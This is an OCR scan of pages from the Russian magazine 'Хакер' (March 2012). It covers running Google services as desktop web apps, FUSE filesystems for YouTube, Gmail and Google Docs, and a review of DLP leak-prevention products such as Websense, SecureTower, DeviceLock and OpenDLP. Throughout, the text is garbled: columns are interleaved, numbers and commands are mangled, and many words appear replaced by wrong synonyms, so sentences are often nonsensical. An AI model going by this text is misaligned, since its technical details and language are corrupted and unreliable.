Мы ранее писали об этой утилите на одном изо про­

Goog leCL

шлых номеров, бард ому моя персона безграмотный буду возобновляться

следующих запусках сервиса ни аза инъекцировать

да прямо-таки приведу мало-мальски примеров ее ис­

равно доказывать никак не н у жно.

нате удаленное у правление. При по­

-7

Инструменты

-7

Создать

мещения ярлыка [рабочий столик и/или меню приложенийl, и- вуаля!- получай рабочем столе появится ярлык, до клику возьми котором

во обособленном окне откроется сайт без ненужных обвесок на виде карта браузера

да строк ввода/поиска . То а самое, причем даже изо командной строки, дозволяется произвести

пользования.

да вместе с приложениями, установленными со по­

мощью Chгome

Публикация п ос та во благе не без; через

0.

Bloggeг:

Мы нашли массу приложений , способных

Web Stoгe [по клику правой

кнопкой мыши!:

подменять далеко не всякий раз годный веб-интерфейс

$ google. b.lagger с c:ti tJ.e 'Я в сЦ :.. 'Oткpt>UJ

рщt --Ьlog

'Linuxoid' \ Googlech l ' .--:tags ' linux, \ ДllЯ . ceбя _Google(:~, . \ .

...... Ы.а. с!:>lа, ..1;11а .: . Добавление перипетии на календарь:

0.

сер висов. Но в чем дело? буде в целях какого-то экзо­

$ chromium --app=http : //gmail.com

тического веб-сайта до этих пор малограмотный разработано нужного приложения иначе существующие нам

Достаточно мыслящий администратор

безвыгодный приглянулись [как вариант, понравился

окон сохраняет месторасположение да размеры окна

плоский веб-интерфейсl ? В этом случае

предварительно закрытием да восстанавливает его

дозволяется употребить технологию

Desktop web

appl i catioп, которая обеспечивает включение

получи и распишись прежнем месте близ следующем запуске.

Функция веб-приложения вкушать равно на браузере Fiгefox. Здесь всё уже уймись : достанет пере­

> youtube

vieыer

>

lnsert an YouTube Ul!l or search somethi ng .•. linux

0 2 3 4 5

-

Б -

0 В -

0 18 11 12 13 14 15 16 17 18 19 28

-

UberStudent 0/eview - liпux Distro 0/evieloJS lby lnflnitely6alactic ) ( 01 :58) Ubuntu 01 . 08 0/eview- linux Distro 0/evieloJS lby lnfinitelyGalactic) 013 : 02) How То Baclc:up Your Frugal Puppy Using Puppy linux lby icyos ) 083 : 06) Creating а DeЬian AIIM JМG for Archos - linux - Part 0 l by metalx1BBВJ ( 08 :56) linux Mint 02 0/evieы- linux Distro 0/evieloJS lby JnfinitelyGalact i cJ 012:41> linux is Better Тhan llindoloJS lby loclc:ergnome) ! B5:BBJ linux lby llhatYouDughtтoKnow) 084:32) linux Mint 02 0/evieы 0 LA5 0 s19eBB l by jupiterbroadcasting J 055 :49) Js Desktop linux Dead? 0 LAS 0 s19e84 lby jupiterbroadcasting ) 081:18 : 08! linux Opti11ization lby Jockergnome) 085:35) openSUSE 02 . 0 0/evieы 0 Тhе linux Action Sho"'! lby jupiterbroadcasting) (55:52) Pinguy OS 01 . 01! 0/evie"'- linux Oistro 0/evieloJS lby lnfinitelyGalacticJ 018 :44) llindoыs is Better Тhan linux lby loclc:ergnore) 084 :87) Fedora 05 0/evie"'- linux Oistro 0/evieыs l by InfinitelyGalactic) 019:17> Мessages from the linux Cшmunity lby ТhelinuxFoundationJ !85:B3 J linux Mint Cinnai!IOfl Desl<top early lool< Jan 08th 0812 lby linux4UnМe) 087 :56) Тhе Не"' Нui\Ьer One Distro? - linux Mint 02 lby gotЬletuJ 088 :1!3) IIIHOOIIS VISТA AEI/0 VS LIHUX UBUHТU BEI/Yl l by tearbd2J 084 :33 ) An lntro to linux Part 0: llhat is linux? !Тhis lleel< ln linuxJ !Ьу th i sыeelc:inlinux) 083:26) Fedora 06 0/eview- Linux Distro 0/evieыs (Ьу lnfinitelyGalactic) (87:57)

тянуть favicoп сайта для пролетарий стол, равно ярлык появится сам по себе собой.

Зто в самом деле способный дорога созда­ ния веб-приложений в рабочем столе, же он не лишен некоторых недостатков. В частности, лично меня очень напрягает, который ливрезон

достаточно трудиться перед управлением примерно да лишен­ ного элементов управления, же полноценного

веб-браузера из плагинами, расширениями и во всех отношениях остальным совершенноненужным

во данном случае балластом, тот или иной всего лишь сжирает парамнезия равным образом процессори безвыгодный слабит

безличный пользы. Позтому мы рекомендовал

бы проэксплуатировать на подобных задач более легкие решения, для примеру минималистичный браузер suгf. Браузер suгf основан бери движке

WebKit,

неграмотный имеет интерфейса да управляется со помощью клавиатурных комбинаций . Это самый легко­ весный да проворный изо всех браузеров, основан­

Youtube-viewer- консольный скрипт про просмотра роликов из YouTube

012

ных получи полноценном НТМL-движке, а оттого дьявол

ХАКЕР

03/158/2 01 0


Д остуча ть ся д в отношении н ебес

Sup- Мutt-подобный

клиентела про

Gmail

совершенно к лицу с целью запуска приложений.

(наnример , во поисках интересн насчёт г насчёт видео

Самый аляповатый версия его запуска выглядит

бери

эдак :

(например , пользу кого управления п что до чт ой ! да ис­

YouTubel,

производить да отринуть файлы

пользоват ь р азнообразные пер ен аправления ввода-в ы на в отношении да. Для тех но серв исо на Гугла

$ surf http:)/gmail.com

существ у е т ч етыре таких вирт уал ьных фай­ ловьlх не без; равным образом сте м ы возьми основе

во него всего узенькую полоску загрузки,

FUSE: Yout ubeFS, GDataFS, Gm aiiFS, Google Docs FS (ес ть еще goofs, а сие полузаброшен н ая Jаvа­

На экране появится интерфейс

Gmail

на аб­

солютно голом равно чистом виде. Браузер добавит

# vi /etc/gmailfs/gmailfs.conf [account] username=usernamegmail.com password=параль [filesystem] linux_fs_4 fsname

которая отобразится во нижней части окна.

произведение l. Та кж е на Сети можн насчёт н айти f lickгfs ,

Чтобы показать нужные норма окна одновременно

предна з н ач енн у ю про загруз ки изоб ражений

в промежуток времени запуска, позволительно ухватиться

возьми flickг.co m равным образом MetaWeЫogFS. С ее сообразно мощью

у тилитой wmctгl:

можн по отношению п ости ть на блоги напрямую с комок андной

[logs] l evel=INFO logfile=- / gmailfs.log Затем н у жно примонтировать файловую систему:

строки .

Крат ко относительно пройдемся согласно по всем статьям фа й ловым

#!/Ьin/sh

surf http://gmail.com wmctrl -r surf -е ·e,se,se,4ee,зee· С крипт откроет

Gmail

размер окна равным

на окне suгf, сделает

000 х 000

равно разместит

его во левом верхнем углу, не без; отступом

00 направо

да сверху. С через среды рабочего стола

системам да попробуем понимать не без; я, ко а ко да х

использовать. Итак, Youtube FS !code .goog le. com/p/youtubefs/1 - файловая си ст ема в целях до­ ст у батман для YouTube. Этой системы вышел во большин­

$ ./gma ilfs.py

allow_root

поnе

\

/ тракт /до/каталога

Теперь перейдем ко Google Docs FS (code. google .com/p/google-docs-fs/1 . Эта файловая

стве дистриб у тивов, всё же к ее у табор что касается во ко равным образом

концепция предоставляет подход для документам

шабаш от бросать вместе с сайта тарболл равно распако­

Google Docs.

вать его . Пользоваться так:

на правах да однако прочие ФС во нашем обзоре:

$ ./youtubefs .py \

$ gmount

Использовать ее беспричинно а просто,

скрипт несложно обратить во обозначение равным образом уместить

бери рабочем столе .

/ nуть / предварительно /ка талог а

\

/ траектория / по /каталога

П осле сего на указанном каталоге появят­

После сего во катало г е появятся подката­ логи да файлы на аккуратно таком а виде, на каком

Иногда удобнее малограмотный эксплуатнуть специаль­

ся весь плей-листы равным образом каналы, держи которые

ные клиенты, а собирать веб-сервисы

ть1 подписан . В каталогах твоя милость найдешь самочки

они представлены нате сайте

во виде бесхитростный файловой системы, идеже позволено

видеозаписи. Аналогичной функционально­

Документы дозволительно копировать, перемещать,

стью обладает

присоединять равным образом удалять. Для отключения исполь­

бродяжничать не без; через файлового менеджера

net l,

GOataFS

( gdatafs . souгcefoгge .

которую дозволено отрыть на репазитариях

docs.google.com.

з уем команду gumouпt:

дистрибутивов. Синтаксис ее вызова не­

$ gumount

какое количество иной:

GOOGLEAUTH

$ gdatafs

l:i§l:lei!C!I

\

/путь)до/каталога

/ колея / вплоть до /к аталога

Веб-сервисы от п особны заместить только в чем дело? не

параль

что попало настольное приложение. Их невыгодный нужно Недавно

Google

изменил способ

Файловая налаженность

GmaiiFS

( sг71 . net/

вычислять равно обновлять. Они позволяют

аутентификации сторонних приложений,

pгojects/gmailfs /1 предназначена с целью монти­

никак не беспокои ть ся в рассуждении сохранности данных равным образом на­

потому на каждой программы lскрипта),

рования почтового ящика

строек . Однако самостоятельно интерфейс веб-сервиса

ет получай основе протокола

может отнюдь не подступить некоторым пользователям

работающей не без; аккаунтом

Google, nридется

Gmail. Она работа­ IMAP, потому хуй

основать единичный nа значение . Для сего заходим

ее использованием придется привнести его

тож предстать через силу тяжеловесным тож

получи и распишись страницу

https://www.goog le.com/set-

поддержку на настройках сервиса (Настрой­

назойливым. В этом случае удобнее об­

tings, а там

выбираем оnцию << Авторизация

ки~ Пересылка равно

ратиться для специализированным клиентам

IMAPI.

nараль да задаем новоиспеченный nараль со nомощью

конфиг

сnециальной склад на конце страницы.

содержания :

03/158/2012

~Включить

После сего надо разработать

nриложений равно сайтов ~Изменить», вводим

ХАКЕР

POP/IMAP

/etc/gmailfs/gmailfs.conf

следующего

да файловым системам, которые, вроде твоя милость смог убеди ть ся, на достаточном количес тв е имеют­ ся получай просторах Сети . :::И:

013


SYN/ACK

Гуля « gгindeг » Яремчук lgгindeгlё!synack.гul

БОРЬБА С УТЕЧКАМИ КОРПОРАТИВНОЙ ИНФОРМАЦИИ

-

Важныйэтап в развертывании

DLP

-внедрение, нет-нет да и

В современном мире одним изо ключевых экономических ресурсов является

информация. Кто ей владеет, оный бросьте у кого есть успех, во в таком случае но промежуток времени вытекание данных практически постоянно означает потерю клиентов, а так равным образом неудача компании . Именно

потому настоящее таково велодрын выигрыш для DLР-решениям, позволяющим обнаруживать и предотвращать передачу конфиденциальной информации. Выбор большой, лидеры еще отнюдь не сформировались, а предложения многократно схожи в соответствии с функциям, хотя отличаются логикой работы равно заложенными принципами, посему выработаться невыгодный где-то просто.

должен четко сформулировать требования и ожидания

да «Обесnечить »

DLP

-

всеми данными интересах

контроля .

Репозиторий

про

Ubuntu MyDLP- <tow_n_-

~111.edгatecb .

иm.lц!шn.tu .

ХАКЕР

03/158/2012

.


В поисках равно н ущелье д бретер

КАК ВЫБРАТЬ

DLP?

Информационная защищенность стала одной изо поезд л яющих дея­

тельности первый встречный компании, а соответствующие риски влияют в ее рейтинг равным образом притягательность ради инвесторо на . П об ста т истике, на е ­ роя т ность прибыль конфиде н циальной информа ц ии через дейст во ий

сотрудника организации [и н овраг д ера] превы ш ает вероят н восток ь уте ч ­ ки на результате взлома, притом сие отнюдь не обяза т ельно умышленные действия, юзер может ненамеренно отпра на ить обложка безграмотный тому адресату. Д по отношению появления интернета наблюдать деятельнос т ь

ОШИБКА В РАБОТЕ

DLP

МОЖЕТ

ПРИВЕСТИ К БЛОКИРОВКЕ ВПОЛНЕ ЛЕГАЛЬНОГО ТРАФИКА И ПОМЕШАТЬ РАБОТЕ СОТРУДНИКОВ

сотрудников было без мала невозможно. Н ет, установить контроль, конечно, было реал ь но, да технических средс т на для автоматизации для ц есса неграмотный су щ ествовало. Сейчас всё изме н илось.

ражения равно т. п.]. Хорошие системы, вроде правило, используют постоянно

Деловая переписка положено за электронной почте, пользователи

доступные технологии , а управленец может несомненно образовывать

общаются путем

устав собственными силами для основе подготовленных шаблонов .

lM

равно

VoiP,

обмениваются файлами, ведут

блоги, публикуют сведения во сацсетях равно т. д. Все сии каналы

Кроме того, DLР-система должна ручаться службу безопасно­

свободно осматривать автоматически, сила современных

сти инструментом в целях анализа всех событий равным образом архивом переданной

серверов равным образом поместительность носителей позволяют вербовать равно обрабаты на ать

информации. Еще одним критерием, определяющим коллекция

эмпирика на реальном времени. Ч тобы обнаружит ь да пре д отврати т ь

является вероятность не допускать утечку дан н ых во реальном вре­

передачу конфиденциальных данных сверху разных каста п ахти [при пере­ меще нии, использовании равным образом хранении ] , применяется весь сословие

мени. Однако специалисты кто как относятся для этой функции,

систем защиты-

особенно бери этапе ввода во вон как из плуатацию] может обусловить ко бло­

DLP [Data Leak

Ргеvепtiоп] . На теперича суще­

так-таки ляпсус на работе

DLP,

DLP [а ложные срабатывания случаются,

ствует до настоящий поры не без; десяток терминов-синонимов в целях таких сис т ем:

кировке в полном смысле слова легального трафика, а значит, расстроить работе со­

[lпfoгmatioп

трудников . Поэтому многие администраторы предпочитают расследование

ILDP Leak Detectioп & Pгeveпtion], IPC [lnfoгmation Pгotection and Contгol], ILP [lпfoгmatioп Leak Ргеvепtiоп] равно др . Задача у них,

за факту, а безвыгодный блокировку.

на общем-то, простая - мониторинг, да д ентификация да столп .

Официальных стандартов, в рассуждении п ре д еляющих, какой-нибудь д олжна присутствовать

DLP,

WEBSENSE DATA SECURITY SUITE

непостоянно безграмотный существует, почему разработчики nо-разному смо т рят

Са й т проекта :

получи функции

Лицензия:проприетарная .

DLP.

Часто допускается повстречать самые небо и земля реали­

websense.com .

зации, далеко не денно и нощно включающие фактически необходимое или,

ОС не без; ервер :

наоборот, напичканные ненужным функционалом, добавлен н ым

ОС клиенты: Windows Vista , 0, 0003, 0008/R2.

в области заказу компании. Однако со временем определились некотор ы е

Русифи для ация: отсутствует.

требования, которыми требуется быть носителем полнофункциональное

Windows Server 0003 R2 .

Калифорнийская организация

Websense

здорово известна вроде

DLР-решение. В первую каскад они касаются д иапазона возмож­

производчик систем филырации веб-трафика, во частности,

ных каналов утечки:

на

электронная связь

[SMTP, РОРЗ, IMAP];

Facebook

задолго полноте внедрена ее разрабатывание в целях защиты быть

переходе до внешним ссылкам. Решения ориентированы во первую

программы обмена IМ/Vо iР -сообщениями равным образом Р2Р-клиенты; веб-ресурсы [социаль н ые се т и, форумы, бло г и], а вот и все пере ­

караван для сре д ние равно круnные компании со штатом сверху

000

сотрудников да государственные учреждения. Комплекс Webseпse

вслед итог контроля основных каналов обмена д анными позволя­

взятка файлов в области протоколам НТТ Р, НТТ РS да FТР ;

DSS

сетевая распечатка [SM В P гinting, NCP Pгintiпg , LPD, равным образом т. д . ]; внешние устройства [USB, CD/DVD, принтеры, Bluetooth, модемы и т. п . ], сетевые папки .

ет во реальном времени остановить утечку конфиденциальной ин­ формации . Он работает держи основе технологии цифровых отпечатков PгeciseiD, разработанной компанией PoгtAuthority которую

Websense

купила на

0006

году .

PreciseiD

Technologies,

обеспечивает вы­

сокую правильность обнаружения конфиденциальных данных да далеко не име­

Характер п ередаваемых ну да нн ых определяетс ваш покорнейший слуга чрез обнару­

жения специфических признаков [метки, хе ш- фуй н кции, грифы ] и анализа контента [статистический анализ, регулярные доставать

ет некоторых недостатков лингвис т ических методов . Д анные опи­ сываются быть помощи « цифрового отпечатка >>, представляющего

~.:._:=~ -~ ~-~-'"'-w ~~.--------,IЬ"',..=.-= ..:::~=·=-·- - - - - - - - - J ....

·-. --

0dl c.-c~

lii $~--

'""'""""!''!IIIIICI!I=a=ВI!!Iii!!IC=---~~==~

~~

.......

___

:IJ"ICO:u'lq~Yypts

---~ __.... • 0 • IG • \2 • 0 • • • '

~-~

'11"~... .._

,) 12 • 0 • • • '

• 0 • 'IO • Il

...... '!~"

__ .._

~~,._

--

к..---

в-

--

--

е

_

-----------

____

~~~-r,.",

.

-

! в.:-

.-

.

01Ь!88!-=- • 0rь.-.

ее

• - Р--а - з.--

Н аст борть ка разреше н равным образом й на

ХАКЕР

03/158/2012

DeviceLock Endpoint DLP Suite

Установл е нны й

DeviceLock DLP вместе с кляча жит шпалеры

го так на ых n рав осадок

015


SYN/ACK

WEBSENSE DSS ОПРЕДЕЛЯЕТ РЕАКЦИЮ НА ИНЦИДЕНТ ЛИБО ТРЕБУЕТ ПОДТВЕРЖДЕНИЯ ОТ ОТВЕТСТВЕННОГОСОТРУДНИКА

Websense Web 0ecuгity Gatewayl. П оддерживается объединение · с Act ive Diгectoгy, Novell eDiгectoгy да Lotus Domino. Совместно с Websense 055 используется полоса других приложений, рас ш иряю­ щих потенциал колтун пл екса DLP: Data Еndроiпt-устанавливается получи конечные П К, идеже контро ­ лирует данные, передаваемые вследствие U5B равно рядом печати, попытки сделать скриншоты экрана, сведения lM да т. д . ; Data Мопitог - осуществляет прогноз каналов передачи, · чтобы об п ределить, кто, куда, в духе равно сколько ото пр авляет, да сопостави ть с политиками равным образом бизнес-процессами, снижая риски;

Data Ргоtесt-включает Data Мопitо г, автома т ически блокирует собой пакет символов либо слов документа другими словами со д ержимо го полей

утечку данных возьми основе политик;

БД. Такой соответственно д передвижение обеспечивает точную классификацию контента

Data Discoveг- расписание чтобы поиска равно классификации конфи­

больше нежели для того 000 форматов давно кументов (включая та блицы СУБ Д

денциальныхданных, которую позволительно пускать в дело что на составе

равно сжа твоя милость е файлы ! , ну да но неравно сведения перенесены иначе конвертиро­

055, таково да отдельно, безграмотный требуетустановки агентов.

ваны во иной формат. Кроме PгeciseiD, используются иные алго­ ритмы : словари, точное равным образом частичное совпадение, статистический

Для управления всеми решениями Websense используется

обсуждение равно т. д. Вместе вместе с тем к анализа информации во продуктах

единая кронштейн Websense TRITON Coпsole (Java равным образом Apache Tomcatl.

Websense nрименяется порядком технологий Deep Content Сопtгоl

Websense 055 бог легко устано скручивать . В картотека сделано входит М5 0QL 5ег v ег Expгess 0008 R2, а к больших сред кризис миновал ис п ользовать

равно T hгeat5eekeг (сканирова н ие веб-сайтов равно открытие новых угроз).

полную версию. Первоначальная набор дипломат производит­

П роизводится наблюдение основ н ых каналов передачи: элек­

тро нн ой почты (5М ТР ), сообще ний М5 Exchange, НТТР/НТТР5, FТР, IM/M5N . П редусмотрена соединение по части ICAP со любым да нт ернет­

ся близ помощи не мудрствуя лукаво г по отношению мастера, создающего шаблоны не без; учетом страны да харак т храбрец деятельности организации, во книга числе имеют­

ся да региональные настройки пользу кого России .

шлюзом, поддерживающим сие т п ро т окол. Для мони т оринга сервер

FALCONGAZE SECURETOWER

Websense может водворяться на руптура другими словами использовать зеркалирование трафика (5PANI. Websense 055 ав т оматически определяет реакцию сверху инци­

Лицензия:nроnриетарная.

дент либо требует подтверж д ения с по части тв етственно г касательно сотрудника.

ОС сервер:

Система умеет запирать передачу конфиденциальных данных,

ОС клиенты:

посылать повестка !специалисту службы безопасности,

Русификация: есть.

Сайт nроекта:

начальнику иначе владельцу контентаl, совать внешнюю про­

falconqaze.ru .

Windows 0003/2008lx86/x64). Windows XP/Vista/7/2003/2008lx86/x64).

Относительно молодое решение, разраба тыв аемое россий­

грамму, отправлят ь требование н а п од тв ерж д ение отправки равным образом др.

ским 000 «Фальконгейз>> . П редставляе т на лицо программный

Система присваивает ан ц иде нт у у никальны й штучка да прикрепля­

продукт, использующий для того поиска конфи д енциальной инфор­

ет ко сообщению файл. Администратор задает г ибкие политики

мации технологии контентного, а три бутив н ого да ста ти вместе с т ическо­

не без; учетом торговля -проц ессов килоом п ании, а во комплекте поставки уж

го анализа (ключевые слова, регулярные выражения, след

в наличии порядком д еся т засада шаблонов равно н астроенных отчетов

равным образом т. д.) . Обеспечивает инспектирование всех популярных каналов прибыль

согласно инцидентам да активности п ользовате л ей. Продукты Websense

данных, во часть числе что касается т слеживает из-за ш ифрова нны й траффик

отдельных сотрудников другими словами групп, защищают корпоративную

(НТТР/5, FТР/5, РОРЗ/5, 0МТР/5, IMAP, 05CAR, ММР, M5N, XMPP I Если на организации используется М5 Exchange 0007/2010, так все

документацию ото внесения несанкционированных изменений.

внутренняя равным образом внешняя переписка тоже проверяется сверху соот­

Остальные потенциал включают п ринудительное зашифровка

ветствие политикам. Особо руки чешутся экстрагировать полную поддерж­

позволяют сдержать вход ко опре д еленным сведениям к

электронной п оч твоя милость (ч ерез шлюз! да совместную работу вместе с други­

ку 0kype, во всяком случае 0есuгеТоwег может затягивать голосовой

ми продуктами Websense (напр имер, со шлюзом безопасности

трафик, текстовые сообщения, файлы да отправляемые 0М5.

ВОЗМОЖНОСТИ

OPENDLP

Проект OpenDLP lc ode.google .com/p/

помощи SSL !используется libcuгl) . Настройку

(nолучать оглавление файлов, на которых найдены

~1 предлагает ахиллесова пята инструментов

большого числа агентов упрощают профил и,

совпадения) равно заворачивать работой агентов

на nредотвращения возможных утечек

содержащие взгляды сканирования.

!пауза сканированияидеинсталляция

информации от клиентских машин,

В взгляды на жизнь х в целях описания объектов поиска

агента) . В текущей версии безграмотный производится

работающи х лещадь управлением Windows . Для сего для подчиненных комnах

используются Регl -со вместимые регулярные

проелушивание сетевого трафика, а тоже

выражения , позволяющие раскрывать

разбирание информации, копируемой получи показной

устанавливается низкий агент.

н касательно паллиатив кредиток равным образом паспортов ,

Само расширение производится

пароли, показывать наличность держи ресурса х

документы во текстовом формате, хранящиеся

во автоматическом режиме вследствие Netblos/SMB .

документов не без; конфиденциальными данными

в жестком диске колтун танцевальный шаг . Проект доколь

Кроме того, вроде прямое просматривание

равным образом изучать их обработку получи внешних

находится на стадии активной разработки .

систем минуя установки агентов во

Windows !через SMB), *niх-системах ISSH) равно СУБД IMS SQL равно MySQL). Централизованное руководство

сервисах IGoogle Docs , Gmail) . Администратор

Первая видоизменение лещадь номером

может настроить вороной да пребелый опись

на апреле 0010-го, текущая версия-

каталогов про сканирования равным образом вынуть душу

Серверная доза написана сверху языке Регl , в целях

осуществляется подле помощи веб - интерфейса,

отслеживаемые расширения файлов .

установки разработчики рекомендуют

воздухообмен данными не без; агентом производится

В сегодняшнее минута интерфейс позволяет

равно

соответственно каналу связи, зашифрованному подле

просматривать результаты сканирования

016

SSN ,

рупор эпохи , конспект проверяет всего-навсего

0.1

представлена

0.4.3 .

Apache Linux, ради х ранения данных используется MySQL. Агент написан нате языке Си. Исходные

ХАКЕР

03/158/2012


В поисках инсайдера

р

• "--R- м.. - ..,.. _ · -

~~~~~~--------------=~~ lti!Ar. ......

~

• .__w.._........,."...._......,.....,.._..,......,.,.r...,__.._._.._• ._,._w.,_.._.._ ... ___ ....,.

что до --

- ·-

.

М! Dq!t!aR "' !:t_. "'D ,em

fQ ~

0Z!SIПa

wш~·

-..-.

_.,_._.......,.., _ _

...-~

rQ ~Scnll

0]iO.J5

_",_.._,

I!Xm!Ncr!SIOWdnмA'ft•l

0tJ ~

$acll

d4J'S

~.,.,._._.,.._,...1....

0[) ~

0о1:С

~

~.,*~,._

~$tp!trdeмi'И1

~==::

~

'4 ~$atlt

WtteqsJEJrtd;IQattr«di!

ro ~

~

r{J ,....... ~

IQ!StqyyD9!\'Ьrdцr+1

--=. . _. "'~

~ '""""*-1

r/J ~

.S0i1t

:::

s.r.

...us

Scr1>l

0835

=::~=-==..:= О.С.. .................. . _

_ . , ....... ......., ..... Н-

031815

_"'._..,. ........... ~ ~., . . . . . - - - - . . . . :к...

~

_ _ ., ............... >d.-

==::

....

r/J ............... ...._ t,Q .......,. --~

t.JI0]5

- < t i - S 0 ........... 0.~

0.J80J5

~--.и--

riJ ~ ....,.е._

dD35

":J ~

~

&.us

~

lt} ........... _ . ,

018)5

_.,s.-.8r~~

~

~~ ~

08И

~"!~~~~

....... -1~---

ИQmAgpiJ!tyrlwм'tJ•ppt

Шаблоны

~"'-'

0IIQ.ta

wн.rurnмt!Qnмtю!aJ

............ .......... """''"' .......

•-

~

АФ!оr•м•и•n

NA«n " F«f·''"A

..""*"•

0cпJrnltetcт....twu-nl,.......'i'nч•

~

:g:::

rD"""""*'"" - . - . . . !/J """"*-1 ._...е.-

гггг ~ · J

~ ~

В касательно

____

~-

·-·

~ Sllld . . ........, ................... _~ ........... ..... s

~ --

~ ............ ~.-.......... -

~-- ... .u.a!8

• 01111D

____ .. _..,_

... ",. ..... . , . - . . . ..... ..,.__

~ .... - - - -

...

~ ~ l"'::ler.............. ..._., ~."..

,."

c-.-e::IIO.. " - • ""'--_..., ...........-..

-

..... c.-oм-a: ... ......,JJ L-Qoo81:0'8_.._ . . . . . .

=--........- . . .

-..:..,_ ... ...".а-м-. -----~-t.al

::::::~:::::.=.-.:.

-fii...-И168it_.........._ _ " ,..u...,..._..~ -r~-- IIIIW>•-

.

_.,s...a,~~

гггггг- ,.-

Выбор nолитики во рента

Websense DSS

Не до этого времени DLP сие умеют сиречь обеспечивают во полном объеме !чащ е ус тановленный ходатай контролирует чуть текстовые сообщения].

J ...... _ ,..__. ..... a.

Websense Data Security Suite

ния адски пр ос т , пользу кого управления , создания правил равно анализа

испо льз уется консо ль администратора

Falcongaze SecuгeToweг Falcongaze SecuгeToweг

Перехват трафика может являться настроен выборочно: согласно IР­

Admiп Coпsole равно консо ль безопасности

адресам или — или диапазонам, МАС-адресам, п ортам да протоколам,

Clie nt.

логинам, размеру файлов да т. д. Система распознает защи­

щенные шаг роле м документы MS Woгd/Excel, PDF равным образом многие

правил , позволяющих сорвать покровы отправку ряда данных !номеров кредиток, ИН Н ], визит соц из етей, отправку конспект про по­

типы архивов. Когда юзер отправляет акт иначе говоря

иска новой работы равно др .

В усик тановленной системе предприимчиво сколько-нибудь общих

архив, непроницаемый шаг каток ем, возлюбленная генерирует история да предо­ ста вляет администратору полную информацию равно копию файла.

DEVICELOCK ENDPO INT DLP

SUIТE

SecuгeTo weг контролирует информация , копируемые получи и распишись внешние

Сайт nроекта:

усишко тройства , качество получи и распишись локальных равно сетевых принтера х. Чтобы

Лиценэия:nроnриетарная .

избежать ошибки близ опре делении отправителя, SecuгeToweг, кроме общепринятой информации, паркет уче нной изо домена ,

ОС сервер: Windows NT/2000/XP/2003/Vista/2008/7. ОС клиенты: Windows NT/2000/XP/Vista/7.

анализирует безвыездно контактные данные, IР-адрес да век его

Русификация: ест~

использования, логин на различных месседжерах равно т. п. Дал ее

devicelock.com/ru .

Система

DLP, построенная Oevicelock, которое

получай основе по от таточно известного

построение заводи т переанальные карто чки , от через которых

решения

все собранная уведомление привязывается для учетным записям

сту батман пользователей ко различным периферийным устройствам.

!возможна объединение не без; Active Diгe ctoгy ].

Device loc k разрешает/блокирует ход из учетом следующих

Кроме того , SecuгeToweг имеет функции, далеко не специфичные в целях

DLP,

да до чертиков востребованные на большинстве организаций. Та к,

от ее через дозволительно надзирать работу сотрудников- си ­ стема эпизодически делает скрины как ранов к детское место ую щ е го

просмотра во х ронологическом поряд ке, в отношении т слеживае т внутренние

используется пользу кого контроля до­

параметров: логина, типа, времени суток , формата файлов и т. д . Сейчас сие узловой элеме нт системы

DLP,

восполненный

что касается пциональным да модулями Netwoгklock !анализ данных , пере­ дава емых объединение мережа ] равно Coпtentlock !собственно, отвечает вслед ана­ лиз равным образом филырацию данных]. Благодаря новым возможностям научился блоки ровать усишко тройства , отслеживая на книжка

да внешние контакты. При этом формируются наглядные интерак­

Deviceloc k

тивные отчеты, по мнению зволяющие на дина мике видеть следовать сетевыми

числе равным образом со д ержимое коп ируемы х данных , а безграмотный лишь логин

соб ытиями да активностью отдельных пользователей. На основе со­

п ольз ователя да другие стандартные норма . При этом раз­

светильник нны х данны х жуть нетрудно спрятать , сколько стоит времени сотрудни ко

ные политики пасть навливаются на зависимости ото того, работает

потра тил сверху околесина общение, прен ебрегая своими служебными

колтун пьютер на недотка иначе автономно !оперативный равно автономный режимы]. Система входя во все подробности протоколирует до сей времени поведение поль­

обяза нн остями, да при случае сие имело место. Функционально SecuгeToweг состоит с нескольких компонентов:

зова телей равно осуществляет выборочное теневое снятие копии

се рв ер перехвата трафика- захватывает тенетный затор

данных ради анализа . Она распо з нает сильнее

равным образом пер е верно ет его во баз у данны х чтобы х ранения !наибо лее требова­

да использует порядком механизмов анализа контента: сканирование

тельны й ко ресурсам компонент];

по части ключе вас м словам равным образом шаблонам , во томище числе не без; поддержкой

00

типов файлов

сервер контроля рабочих станций- используется про развер­

регулярных выражений !номера кредиток, адреса, паспортные

тывания агентов держи трудящиеся станции, мониторинга их работы

показатели равным образом т. д . ], словари, отыскивание согласно свойствам файлов равным образом данных

да сбора информации, п ерех вач енной агентами lв часть числе шиф ­

!название, размер , танцевальный шаг роль, стихи да др.]. Благодаря этому DLP

рованного трафика да данны х относительно работе от внешними устройствами];

может встретить текст, сп рятанный, например, на графических фай ­

сервер обработки информации-выполняетобработку, индекса­ цию да разложение данны х, отыскание , отправкууведомлений, формирова­

лах . Реализованы белые списки !списки устройств да протоколов и временные списки], позволяющие пользователю кроме проблем

ние отчетов да пр .

п олучи ть до самого из туп. Возможна соединение вместе с ме ха низмами шиф­ рования Bitlockeг То

В качестве СУБД может оказываться использован Огасlе,

SQLite

MS SQL

Sегvег,

да PostgгeSQL. Система подумаешь масштабируется, рядом

Go, PGP,

ТгuеСгурt равным образом некоторыми другими .

Таким образом, дозволяется дозволить расшифровывать определенные док уме нты только лишь сверху защищенные носители . Клиентская пакет

необходимости на вентерь позволяется по бавит ь н овый сервер, отвечаю­

и контролирует гидробуфер обмена , PгintScгeeп , штамп докумен­

щий вслед за перехват другими словами обработку данных. Пр оцесс развертыва-

тов равным образом обнаружи вает работающие кейлоггеры.

ХАКЕР

03/158/2012

017


SYN/ACK

l'{j i..--UO'd-.....

-........ _,..._...,., т о...•• -~-.,....~--·""'-

~ ln.W.""~;ММ'

'\1ooooohold-ro.~,

~ lnoblo !INIМ. .....

n-ohold-fo<r.ь ......

0

_

z

""-·--,...-....., O ln .W..I'I- IM"f~

l11нo•МW-•""'f""' ..... '

l.] ln.W..UII.IUitO~

'"-•l>old-'--...,..• 0

Q ln_ТU.W..,ID,..._

"""''""""-"""~ ' -,

- ·- · ck-~-ol>old

...

~"'"-""""•......_,.,., • • - " • ,.,...,м

......-t..J.• r ..............

;:~':;:;;:::;~;,:~

-.мw

.......

~--......" .

~<М•otмr...w.u-N

[

Окно настроек

. ,.." _ ,.

0

MyDLP

Просмотр снимков экрана на

Модуль Netwoгklock использует методы

Falcongaze SecureTower инт е тонкость со веб-nрокси [Squidl чтобы фильтрации входящего равно ис­

DPI [Deep Packet

lпspectioп, сильный разбирательство танцевальный шаг кетов! равно умеет отпускать прото­

х од ваш покорнейший слуга щего веб-трафика , эксплуатация во качестве контентнога

колы за исключением зависимости с порта, поэтом у сис предмет позволяет быстро

ф ильтра ради

